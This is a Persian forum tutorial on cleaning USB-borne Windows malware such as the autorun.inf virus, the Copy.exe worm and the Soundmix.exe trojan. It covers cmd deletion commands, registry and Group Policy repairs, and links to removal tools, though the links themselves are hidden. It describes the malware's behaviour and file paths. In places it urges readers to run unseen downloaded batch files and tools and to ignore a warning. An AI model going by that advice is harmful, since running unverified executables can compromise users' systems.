ابتدا با راست کلیک روی درایو C و زدن OPEN وارد ان شوید و فایلی به نام autorun.inf را از داخل درایو هایتان پاک کنید . سپس با راست کلیک و زدن open وارد درایو های دیگر شوید و همچین فایلی را از داخل همه درایو ها پیدا کرده و پاک کنید .

بعد از این که شما همه فایلهای autorun.inf را از داخل همه درایو ها پاک کردید باید بلافاصله بدون انجام هیچ کار اضافی ( حتی نباید جایی کلیک کنید ) سیستم را Reset کنید .

حتما باید سیستم بلافاصله ریست شود .

فرض می کنیم فلش مموری یا RAM مربوط به موبایل شما نیز به این ویروس مبتلا شده باشد .

شما باید فلش مموری یا موبایل خودتون را به کامپیوتر متصل کنید و بعد از دیدن درایو مربوط به ان با راست کلیک و زدن open وارد ان شوید و فایلی به نام autorun.inf را از داخل ان پاک کنید و همین طور که فلش مموری یا موبایل شما به کامپیوتر متصل است سیستم را Reset کنید .

این اموزش مربوط به ویروس autorun.inf بود . اما همیشه این ویروس به تنهایی در درایو های شما قرار نمی گیرد بلکه ممکن است همراه خود چندین فایل exe نیز داشته باشد که اگر شما کامل مقاله را مطالعه فرمایید اسم انها گفته شده است که شما در حین پاک کردن ویروس autorun.inf باید انها را نیز همراه این ویروس از داخل درایو ها پاک کنید .


++++++++++++++++++++++++++++++++++

روش دوم :

برای این که متوجه شوید کامپیوتر شما به ویروس autorun.inf مبتلا شده است یا نه ، باید ابتدا فایلهای مخفی و سوپرهایدن را قابل روئیت کنید .

چون این ویروس به صورت مخفی و سیستمی می باشد .

برای این که فایلهای مخفی را بتوانید ببینید از روش اول برای از بین بردن autorun.inf استفاده کنید . اما گاهی اوقات به دلیل دچار شدن به یک ویروس دیگر شما قادر به دیدن فایلهای مخفی نیستید .
برای این کار کافی است مسیر زیر را دنبال کنید .

Start->Run->cmd.exe

سپس در محیط cmd به root درایو ها رفته ( برای رفتن به ریشه یک درایو باید از دستور cd\ استفاده کنید ) و عبارت dir /ah را تایپ کنید با این کار تمامی فایلهای و فایلهای مخفی درایو به شما نشان داده خواهد شد . که شما با این روش می تونید ببینید که ایا کامپیوتر شما به ویروس autorun.inf مبتلا شده است یا نه .

یک روش برای از بین بردن ویروس autorun.inf استفاده از همین محیط cmd می باشد . که شما باید با استفاده از دستورات داس به root درایو ها رفته و با استفاده از دستور del /a/f autorun.inf این ویروس را از تمامی درایو ها خود پاک کنید . توجه کنید که ابتدا باید درایو c را پاک کرده و بعد بقیه درایو ها را پاک کنید . بعد از این کار بلافاصله کامپیوتر را ریستارت کنید .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])



گاهی اوقات بعد از این که شما به طور دستی اقدام به پاکسازی ویروس اتوران می کنید بعد از چند ثانیه این ویروس دوباره سر جای خود برمی گردد .

این مشکل به این دلیل است که جدیدا ویروس اتوران پیشرفت زیادی کرده و به تنهایی فقط شامل یک فایل notpad به اسم autorun.inf نیست بلکه همراه این فایل چند فایل exe نیز وجود دارد که به این فایل ضمیمه شده اند که نشان از پشرفت این ویروس داشته است .

چند تا از فایلهای exe که اخیرا همراه این ویروس در درایو ها ایجاد می شود و مانع از پاکسازی ویروس اتوران به طور دستی می شود فایلهایی به اسم 3o.exe و sxs.exe و semo2x.exe و system.exe و m88coaim.exe می باشد .

متاسفانه فایل های exe را نمی توان به طور دستی پاک کرد به خاطر این که بعد از پاک شدن سریعا در عرض چند ثاینه یک جایگزین برای خود درست می کنند .

پس برای این که بتوانید به راحتی و به طور دستی ویروس اتوران را پاک کنید باید ابتدا فایهای exe ضمیمه ان را از بین ببریم برای این کار من انتی ویروس Avast را پیشنهاد می کنم که قادر به از بین بردن برنامه های exe ضمیمه شده به ویروس اتوران است مخصوصا فایل 3o.exe . بعد از ان شما به راحتی می توانید به طور دستی فایل autorun.inf را از درایوها پاک کنید .

پس شرط از بین بردن ویروس اتوران به طور دستی این است که شما قبل از ان با انتی ویروس Avast سیستم را به طور کامل ویروس یابی کنید تا برنامه های exe همراه ویروس اتوران از بین بروند .

++++++++++++++++++++++++++++++++++

روش سوم :

این روش شاید دیگر به این راحتی ها جواب ندهد به این دلیل که ویروس اتوران پیشرفت کرده و دیگر به تنهایی فقط شامل یه فایل notpad نیست بلکه همراه خود چندین فایل exe نیز دارد . اما گفتن این روش هم خالی از لطف نیست .
یک روش هم برای از بین بردن ویروس اتوران این است که برنامه notpad را باز کنید و دستور زیر را در ان کپی کنید و سپس با نام و پسوند autorun.inf ذخیره کنید .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سپس به مسیر tools->folder options->view رفته و تیک گزینه hide extensions for known file types را بردارید تا پسوند فایلهای نیز نمایان شود .

سپس فایلهای مخفی و سوپرهایدن را قابل روئیت کنید و فایل autorun.inf خود را در همه درایو ها کپی کنید با این کار اگر فایل اتوارن دیگری در درایو شما باشد اخطاری مبنی بر جایگزین کردن فایل به شما داده خواهد شد که شما با زدن گزینه yes پیغام را تائید کنید .

این کار را برای تمام درایو ها انجام دهید . با این کار فایل اتوران شما جایگزین ویروس اتوران خواهد شد .
همان طور که گفتم شاید این روش دیگر جواب ندهد .


+++++++++++++++++++++++++++++++

روش چهارم :

copy.exe تروجانی است که گاهی اوقات در تمامی درایو های شما قرار میگیره و با هر بار کلیک بر روی درایو ها فایل autorun.inf فایل این فایل را اجرا می کنه .

یکی از روشهای پاک کردن این ویروس این است که ابتدا شما باید پروسه های temp1.exe و temp2.exe رو از بین ببرید . برای این کار ابتدا باید سیستم را به صورت safe mode راه اندازی کنید .

شما نباید روی درایو ها یتان دابل کلیک کنید چون با این کار ویروس autorun.inf که در درایو هایتان قرار دارد باعث فعال شدن پروسه های temp1.exe و temp2.exe می شود .

بعد از راه اندازی سیستم به صورت safe mode شما باید با راست کلیک کردن و زدن گزینه open وارد درایو c ویندوز شده و به پوشه windows و بعد هم پوشه system32 رفته و دو فایل temp1.exe و temp2.exe را حذف کنید .

البته در بعضی از نسخه های ویروس copy.exe ویروس autorun.inf حتی درون پوشه %win% هم وجود داره بنابراین حتما حتما برای ورود به درایوها پوشه ها را با راست کلیک باز کنید .

نکته : قبل از اینکار باید ابتدا این پروسه ها را از Task Manager پاک کنید . برای این کار با زدن کلید های ترکیبی ctrl + alt + delete وارد Task Manager بشید و پروسه های temp1.exe و temp2.exe را از لیست processes با کلیک بر روی انها و زدن end process حذف کنید .

ویروس autorun.inf با هر بار فعال شدن موجب میشه که دو فایل xcopy.exe و host.exe درون همون درایو فعال بشن و دوباره دو فایل temp1.exe و temp2.exe رو بسازن.

شما نباید فایل های xcopy.exe را با فایل های خود windows که درون پوشه ی system32 هستند اشتباه بگیرید .

برای تشخیص ویروس xcopy.exe و فایل xcopy.exe که در پوشه system32 است باید از حجم انها این دو را شناسایی کرد اگر فایل xcopy.exe حجمی معادل 32 کیلو بایت داشت مربوط به خود ویندوز می باشد در غیر این صورت ویروس خواهد بود .

حالا فایلهای سیستمی را مانند ورش اول از حالت هایدن خارج کنید و ویروس autorun.inf را پاک کنید و بعد هم به درایوهای خودتون نگاه کنید اگر فایلهایی با عنوان xcopy.exe و host.exe بودند با خیال راحت پاک کنید .

برای از بین بردن ویروس autorun.inf از برنامه ای که بدین منظور ایجاد شده است نیز می توانید استفاده کنید .

برنامه به صورت فشرده شده میباشد ابتدا ان را از حالت فشرده خارج سازید و برنامه را اجرا کنید و سپس گزینه scan را بزنید تا شروع به پاک سازی این ویروس از درایو ها شما کند .

اگر فلش مموری یا موبایل شما نیز دچار این ویروس شده است ان را به کامپیوتر متصل نمایید و سپس این برنامه را اجرا کنید تا این ویروس را از داخل usb درایوهای شما نیز پاک سازی نماید .


برنامه هایی برای از بین بردن ویروس اتوران


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])=



[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])



[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])



================================================== =============



باز شدن درایوها با دابل کلیک در یک پنجره جدید یا باز شدن پنجره search

برای حل این مشکل ابتدا باید مطمئن شوید تیک گزینه Open Each Folder In Its Own Window زده شده است . برای این کار به مسیر زیر بروید .
Tools >> Folder Options و سپس تب General
حال اگر مشکل از این قسمت نبود از روشهای زیر استفاده کنید .

روش اول :

ابتدا به منوی start رفته و گزینه run را بزنید و سپس عبارت regsvr32 /i shell32.dll را در ان کپی کنید و سپس کلید اینتر را بزنید .

روش دوم :

به منوی start رفته و گزینه Run را بزنید و سپس عبارت regedit را تایپ کنید تا وارد محیط رجیستری شوید .
به هر دو مسیر زیر بروید

HKEY_CLASSES_ROOT\Directory\shell
و
HKEY_CLASSES_ROOT\Drive\shell

در پنل سمت راست ، مقادیر پیش فرض عبارات بالا رو پیدا کنید. سپس روی انها دابل کلیک کرده و در قسمت Value data عبارت none را قرار دهید و سپس روی دکمه Ok رو کلیک کنید.

روش سوم :

به منوی start رفته و روی run کلیک کنید و عبارت زیر را داخل ان کپی کرده و کلید اینتر را فشار دهید .

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


================================================== =============



نحوه پاک کردن ویروس Copy.exe

اسامی دیگر این ویروس host.exe, xcopy.exe, temp1.exe, temp2.exe and svchost.exe,Salga-A worm
این ویروس یکی از خطرناک ترین ویروس ها هست که به عنوان یک پروسه در سیستم شروع به فعالیت و انتشار خودش می کنه و با توجه به اینکه بعضی از انتی ویروسها به صورت نامناسب این ویروس را پاک می کنند باعث نمایش یک پیغام در زمان دابل کلیک کردن روی درایو و یا فولدر در محیط ویندوز می شوند .



[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])



برای پاک کردن دستی این کرم شما باید ابتدا همه پروسه هایی که با نام های host.exe, xcopy.exe, temp1.exe, temp2.exe and svchost.exe,Salga-A worm هستند را پیدا کنید و انها را پاک کنید .


تذکر : مواظب باشید این فایلها را با فایلهای اساسی سیستم عامل اشتباه نگیرید .


مهم : یکی از دلایل اصلی به وجود امدن این مشکل ویروس Autorun.inf هست که شما باید طبق روش هایی که در اموزش گفته ام ان را پاک کنید . این کار را حتما انجام دهید . یعنی حتما باید ابتدا ویروس Autorun.inf را طبق اموزش باید از بین ببرید .


سپس به این ادرس در رجیستری رفته و اگر کلیدی به اسم Copy.exe در زیر منوی MountPoints2 وجود داشت ان را پاک کنید .



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید



با استفاده از برنامه های زیر به طور کامل می توانید این ویروس را از بین ببرید .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])


برنامه زیر را در حالت safe mode اجرا کنید


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])





================================================== =============



راههاي دستي براي از بين بردن ویروسی که Show Hidden Files را غیر فعال می کند .

1- از Start Menu وارد Run بشيد و در اونجا تايپ کنيد : regedit
وقتي صفحه ي رجيستري باز شد ، از سمت چپ وارد اين مسير بشيد :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

در اين قسمت ، در ليست متغير هايي که سمت راست وجود دارند ، متغير آبي رنگي ( DWORD Value ) رو به نام Hidden پيدا کنيد و روی ان دابل کليک کنيد . اگر مقدارش ( Value data ) به 0 تغيير کرده ، ان را به 1 یا 2 تغییر دهید و OK کنيد . حالا رجيستري رو ببنديد و ريستارت کنيد .


2- مسير زير رو دنبال کنيد :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
اکنون در سمت راست پنجره ي Regedit روي Type دو بار کليک کرده و مقدار آن رو برابر با group قرار دهيد ( يعني در پنجره اي که باز ميشه کلمه ي group رو تايپ کنيد ).
با اين کار تونستيد Show Hidden Files از دست رفته را که دیده نمی شد برگردونید .


3-مسير زير رو دنبال کنيد :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
در سمت راست پنجره ي Regedit مقدار CheckedValue رو برابر با 1 قرار بديد.


گرفتن و اجرا کردن این برنامه . وقتی برنامه را اجرا کردید به اخطار داده شده توجهی نکنید و روی ok کلیک کنید .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])



================================================== =============


استفاده از فایلهای batch برای از بین بردن ویروس ها

فایل اول :

با این فایل batch قادر خواهید بود ویروس های autorun.inf و ntde1 و h.cmd و amv و amvo.exe را از تمام درایوها پاک کنید . تنها کافی است فایل batch را اجرا کنید و سپس اگر سوالی از شما پرسیده شد کلید Y را از روی صفحه کلید فشاد داده و سپس اینتر را بزنید .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

فایل دوم :

این فایل batch یکی از بهترین روشها برای از بین بردن تمامی ویروسها و همچنین از بین بردن ویروس autoran.inf و همچنین فعال کردن گزینه Show hidden files می باشد . پیشنهاد می کنم حتما این فایل را که حجمی ندارد را دانلود کنید و بعد هم اجرا کنید .

ابتدا فایل زیر را دانلود کنید و ان ار توی دسکتاپ ذخیره کنید و بعد هم فقط کافی روی اون کلیک کنید تا اجرا شود . بعد از اجرا شدن هر جا از شما سوال پرسید شما کلید Y را بزنید و بعد هم اینتر را بزنید در اخر تمام ایکونهای دسکتاپ شما ناپدید خواهد شد .

در این حالت کلید های ترکیبی CTRL + ALT + DELETE را بزنید تا پنجره task manager باز بشه و بعد از باز شدن تسک منجر به تب shut down برید و گزینه log off را انتخاب کنید بعد از لاگ اف شدن وارد سیتسم شوید .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



================================================== =============


راههای دستی برای برگرداندن قسمتهای حذف شده از سیستم شما .

فعال ساختن ( Registry ( Regedit :

روش اول :
ابتدا وارد منوی start شده و روی گزینه run کلیک کنید و کلمه gpedit.msc را تایپ کنید .
در صفحه Group Policy به مسیر پایین بروید:
User Configuration> Administrative Templates> System
بعد از کلیک نمودن بروی System در سمت راست پنجره Group Policy بالای
Prevent access to registry editing tools دابل کلیک نموده و در تب Setting گزینه Disable را علامت دار نموده و بالای کلید OK کلیک نمایید اما پنجره Group Policy را نبندید!
حالا Regedit فعال شده است و شما میتوانید واردش شوید.


روش دوم :
مسیر زیر را داخل note pad کپی کرده و سپس با نام Regedit.reg ذخیره کنید و بعد ان را اجرا کنید .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


برگرداندن Run :

در صفحه Group Policy به مسیر پایین بروید:
User Configuration> Administrative Templates> Start Menu and Taskbar
بعد از کلیک نمودن بروی Start Menu and Taskbar، در سمت راست پنجره Group Policy بروی گزینه Remove Run menu from Start Menu دابل کلیک نموده و در تب Setting گزینه Disable را علامت دار نمایید. حالا گزینه Run فعال شده است.



برگرداندن Folder Option :

برای برگرداندن Folder Option به مسیر زیر در پنجره Group Policy بروید:

User Configuration> Administrative Templates> Windows Components> Windows Explorer
بعد از کلیک نمودن بروی Windows Explorer، در سمت راست پنجره Group Policy بروی Removes the Folder Options menu item from the Tools menu دابل کلیک نموده و از تب Setting گزینه Disable را علامت دار نمایید و بروی کلید OK کلیک نمایید .



فعال کردن task manager

برای فعال ساختن Task Manager در کادر محاوروی Run عبارت Gpedit.msc را تایپ نموده و اینتر کن و سپس به مسیر پایین برو:
User Configuration > Administrative Templates > System
حالا در زیر شاخه System بروی Ctr + Alt + Del کلیک کن و سپس در سمت راست صفحه Group Policy بروی Remove Task Manager دابل کلیک نموده و در تب Setting کزینه Disable را علامت دار کن. بعد از آن بروی کلید OK کلیک نموده و پنجره Group Policy را ببند.


روش دوم :
مسیر زیر را داخل note pad کپی کرده و سپس با نام task manager.reg ذخیره کنید و بعد ان را اجرا کنید .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


================================================== =============

استفاده از برنامه ای که در زیر برای شما معرفی کرده ام

این برنامه قادر به انجام کارهای زیر می باشد .

از بين بردن ويروس هاي ravmon.exe و mdm.exe و SCVHOST.exe و SVCHOST.ini
فعال کردن قسمتهاي زير
NoFolderOptions, NoControlPanel, DisableTaskMgr, DisableRegistryTools, DisableCMD


و به حالت پيش فرض برگرداندن قسمتهاي زير


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


بعد از اجرا کردن برنامه سیستم خود را ریستارت کنید .

================================================== =============



معرفی برنامه هایی که توسط انها میتوانید قسمتهای حذف شده یا غیر فعال شده را به حالت اولیه برگردانید .

مثل : folder option و رجیستری و Task Manager و Hidden F iles و پنجره Run و Windows Firewall و show desktop و show taskbar و حذف اتوران و Group policy و ....


برنامه isReset

حتما با ویروسهایی که فایلهای شما را به صورت سیستمی و پنهان در می آورند برخورد کرده اید. این ویروسها را با آنتی ویروس می توان از بین برد ولی برگرداندن فایلها به حالت عادی کار ساده ای نیست. با استفاده از این برنامه می توانید این فایلها را به حالت عادی برگردانید. برای این کار باید فایل یا فولدرهایی که به صورت سیستمی در آورده اند را به روی پنجره این برنامه کشیده و بر روی دکمه Reset کلیک کنید.


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])




برنامه Linkfars Virus Remover

با استفاده از این برنامه می توانید ویروس جدیدی که اکثر کامپیوترها را آلوده کرده است را از بین ببرید. این ویروس را آنتی ویروس Symantec با نام W32.Linkfars و Kaspersky آن را با نام Malas نامگذاری کرده است.
در NOD32 هم از انواع Autorun شناخته می شود. از اثرات این ویروس این است که با کلیک بر روی یک درایو محتویات آن را در پنجره جدید باز می کند.
همچنین Folder Options پنهان می شود. در همه درایوها یک فایل Autorun.inf و Autoply.exe به صورت سیستمی و پنهان کپی می شود. یک سرویس svchost.exe با نام User شما درست می شود. یک گزینه برای اجرای فایل OfficeUpdate.exe در برنامه های Startup ساخته می شود.
یک میانبر با آیکون فولدر و نام New Folder در بعضی درایوها و به خصوص حافظه های فلش متصل شده به سیستم ایجاد می شود. در هنگام اتصال به اینترنت شعارهای ضد حکومت و دین در بالای صفحه ظاهر می شود و .... فایل را از حالت فشرده خارج کرده و فایلهای داخل آن را به ترتیب شماره های قرار داده شده اجرا کنید.


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])



برنامه Ravmon Virus Removal Tool

بازگرداندن قسمت های مهم سیستم به حالت عادی


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])



برنامه Restriction Removal Tool


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])



برنامه symantec Removal Tools


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])




================================================== =============



پاک کردن برنامه ی مخربی که پوشه ها را مخفی ( Super Hidden ) می کند


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

نام دقیق این برنامه ی مخرب Trojan.Win32.Delf.aam است .

با زبان برنامه نویسی Borland Delphi نوشته شده .

آی...... این Malware * مانند کرم های New Folder.exe و BronTok.A شبیه آی...... یک پوشه است !
بنابراین به سرعت منتشر می شود .

این برنامه ی مخرب تمام پوشه های Open شده توسط قربانی را Super Hidden می کند و یک نسخه از خودش را با همان نام در همان مـسـیـر کـپـی می کـنـد کـه اگـر Victim * آن را اجرا کـنـد هم Malware اجرا می شـود و هم محـتـوی پوشـه ی Super Hidden نمایـش داده می شود !!

یعنی اگه Victim مبتدی باشه به زودی متوجه نمیشه که چه بلایی داره سر پوشه هاش میاد !

هــمــانــطـــور کـه می دانـیــد برای آشـکار کـردن فایـل ها و پوشـه های Super Hidden باید ابتدا در Folder Options\View روی گزینه ی Show hidden files and folders کلیک کنید و پس از آن تیک گزینه ی (Hide protected operating system files (Recommended را بردارید و به پیغام امنیتی پاسخ مثبت و شستی OK را فشار دهید .

این Malware به Victim اجازه ی آشکار کردن پوشه ها و فایل های Super Hidden را نمی دهد !

ضمنا Registry Tools ، Windows Task Manager و Folder Options را Disable نمی کند .

پر واضح است که این برنامه ی مخرب از آشکار کردن پسوند فایل ها هم جلوگیری می کنه !

برای پاک کردن این ویروس می توانید از برنامه ای که نوشتم استفاده کنید .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



================================================== =============


ویروس MS32DLL.dll.vbs

گاهی اوقات داخل درایوها فایلی به اسم MS32DLL.dll.vbs نیز وجود دارد که به صورت مخفی می باشد .
در واقع عامل ایجاد این فایل نیز همین ویروس autorun.inf می باشد و در واقع ویروس اتوران یک master هست و فایل MS32DLL.dll.vbs یک worker .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

یعنی این فایل برای اجرا شدن نیاز شدیدی به ویروس اتوران دارد و با از بین بردن ویروس اتوران این فایل که یک اسکریپت می باشد نیز ناتوان خواهد شد و به راحتی می توان ان را پاک کرد .

این ویروس باعث می شه یه فایل به اسم MS32DLL.dll.vbs نیز در مسیر c:\windows\MS32DLL.dll.vbs ساخته شود .

برای از بین بردن کامل این ویروس نیز شما نباید به هیچ وجه از دابل کلیک استفاده کنید بلکه باید از راست کلیک روی درایوها یا فولدرها و زدن open استفاده کنید . چون با دابل کلیک این ویروس فعال خواهد شد .

همچنین در بعضی مواقع باعث ایجاد متنی با عنوان Hacked By Godzilla ( ممکن است یک نام دیگر نیز باشد ) در بالای پنجره اینترنت اکسپلور می شود

برای از بین بردن این ویروس و این مشکل کارهای گفته شده را انجام دهید .
ابتدا با زدن کلید های ترکیبی ctrl + alt + delete وارد task manager شوید و در تب processes پروسه های زیر را بیندید .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

و سپس ویروس autorun.inf را مطابق اموزش از بین ببرید .
حال به مسیر c:\windows رفته و در صورت وجود فایل MS32DLL.dll.vbs را پاک کنید .
سپس به رجیستری رفته و قسمتهای گفته شده را پاک سازی نمایید .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سپس کامپیوتر را ریستارت کنید .

استفاده از برنامه زیر برای از بین بردن این ویروس :


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])



================================================== =============


معرفی برنامه SmitFraudFix

SmitFraudFix ابزاری است برای از بین بردن ویروسهای مانند adware و malware و تروجان و پاکسازی رجیستری

ابتدا برنامه را از لینک زیر دانلود کنید . و ان را روی دسکتاپ قرار بدید .



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

کامپیوتر را در حالت safe mode راه اندازی کنید
برای این کار سیستم را ریستارت کنید و قبل از بالا امدن ویندوز کلید F8 را چند مرتبه پشت سر هم بزنید .
از صفحه باز شده گزینه safe mode را انتخاب کنید . و سپس وارد یوزر خودتان شوید .
برنامه Smitfraudfix.exe را اجرا کنید . منتظر بمانید تا صفحه زیر ظاهر شود



[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


سپس یکی از کلید های روی صفحه کلید را فشار دهید تا صفحه زیر ظاهر شود .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


عدد 2 را انتخاب کنید یعنی Clean (SafeMode Recommended)0 و سپس کلید اینتر را بزنید
با این کار اسکن کردن و clean کردن سیستم اغاز می شود .
بعد از انجام این مراحل ابزار Disk Cleanup tool اجرا می شود و فایلهای بی مصرف را از روی سیستم پاک می کند .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


بعد از Disc Cleanup پنجره زیر نشان داده می شود .
Do you want to clean the registry ؟
ایا شما می خواهید پاکسازی کنید رجیستری را : کلید Y را فشار دهید تا رجیستری بازسازی شود .
Replace infected file ؟
ایا جایگزین کند فایلهای الوده را که شما کید Y را فشار می دهید .
در این هنگام سیستم احتیاج به یکبار راه اندازی دارد . که سیستم به طور اتوماتیک راه اندازی می شود .
اگر این اتفاق نیفتاد شما خودتان به صورت دستی این کار را انجام دهید .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



در این هنگام فایلی به نام rapport.txt در درایو c ایجاد می شود که گزارشاتی از کارهای انجام گرفته را به شما می دهد .


همچنین این ابزار فایل های wininet.dll را نیز چک میکند مبادا الوده باشند .



================================================== =============


نحوه از بين بردن تروجان Win32/Agent.AEC يا ويروس Soundmix.exe

همون طور که مي دونيد اخيرا ويروسي به نام Soundmix.exe انتشار يافته و باعث الوده شدن بسياري از سيستم هاي خانگي و اداره ها شده است . قصد دارم در اين قسمت نحوه پاک کردن اين تروجان را اموزش دهم .

شايع ترين راه انتقال اين ويروس حافظه هاي فلش مي باشد. هرچند که باز کردن برخي سايت هاي آلوده نيز مي تواند اين ويروس را در سيستم مستقر سازد
اين ويروس با دستکاري رجيستري ، هر بار که ويندوز راه اندازي مي شود خود را اجرا مي کند. با اجراي هر فايل اجرايي در ويندوز نيز اين فايل اجرا خواهد شد و پس از اجرا Processes آن را به هيچ عنوان نمي توان خاتمه داد.

اين ويروس اجازه ديدن فايل هاي پنهان را به کاربر نمي دهد و فايل هايي که مخفي شوند ديگر قادر به مشاهده نخواهند بود. دسترسي به برخي سايت ها ممکن نمي باشد و اين ويروس با اجراي خود منجر به ايجاد سربار روي سيستم ، کندي دستگاه ، بسته شدن ناخواسته برخي برنامه ها و احيانا بوت شدن خود بخود کامپيوتر مي گردد.
همچنين با آلوده کردن حافظه هاي فلشي که به دستگاه متصل مي گردند ، سعي به انتشار خود مي کند.


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


راههاي شناخت اين تروجان

براي اين که متوجه شويد که ايا سيستم شما الوده به اين تروجان است يا نه از طريق فشرن همزمان سه کليد
Alt + Ctrl + Delete وارد Task Manager شويد و سپس به تب Processes رفته و در صورتي که فايل اجرايي Soundmix.exe در حال اجرا باشد سيستم شما به اين تروجان آلوده شده است.

راه ديگر شناسايي اين تروجان عدم نمايش پسوند فايلهاست

از طريق منوي Folder Option و فعال کردن گزينه Show Hidden files and folder و تاييد آن در صورتي که پسوند فايلها نمايش داده نشوند سيستم شما به اين تروجان الوده شده است.

اين تروجان در درايو ويندوز و در مسير زير قرار ميگيرد .
C:\WINDOWS\system32\soundmix.exe

فايل کتابخانه اي ان نيز در مسير زير قرار ميگيرد
C:\WINDOWS\system32\dllcachezipexr.dll

اين تروجان علاوه بر کاهش سرعت سيستم باعث عدم نمايش پسوند فايلها و جلوگيري از دسترسي شما به رجستري ويندوزتان مي شود و باعث دزديده شدن اطلاعات سيستم شما خواهد شد.

اين ويروس خودش را در system32 با نام soundmix.exe و به صورت يک فايل سيستمي قرار مي دهد .
يك كپي در dllcache با نام zipexr.dll نگه مي دارد و اگر شما اين فايل را پاك كنيد بعد از اين كه سيستم بالا مي ايد هيچ فايل exe رو اجرا نمي كند .

سه قسمت را در رجيستري دستکاري مي کند


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدبعد از اتصال حافظه فلش خود به سيستم روي آيکون حافظه که ايجاد شده است کليک راست کنيد. در حالت عادي گزينه هاي زير بايستي نمايان گردد :
Open
Explore
Search
Autoplay
در غير اين صورت اگر نوشته هايي عجيب و غريب مشاهده گردد بيان گر وجود ويروس مي باشد


راه پاکسازي Soundmix.exe يا تروجان Win32/Agent.AEC

در حال حاضر انتي ويروسهايي که توانايي شناسايي اين ويروس را داردند آنتي ويروس NOD32 و کسپر اسکاي و بيديفندر مي باشند شايان ذکر است اين انتي ويروس ها نيز فقط در صورتي که به روز باشد توانايي پاکسازي Soundmix.exe را خواهد داشت .

در ضمن مي توانيد از برنامه اي که براي پاک کردن اين ويروس درست شده است استفاده کنيد .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])


================================================== =============


حل مشکل open with

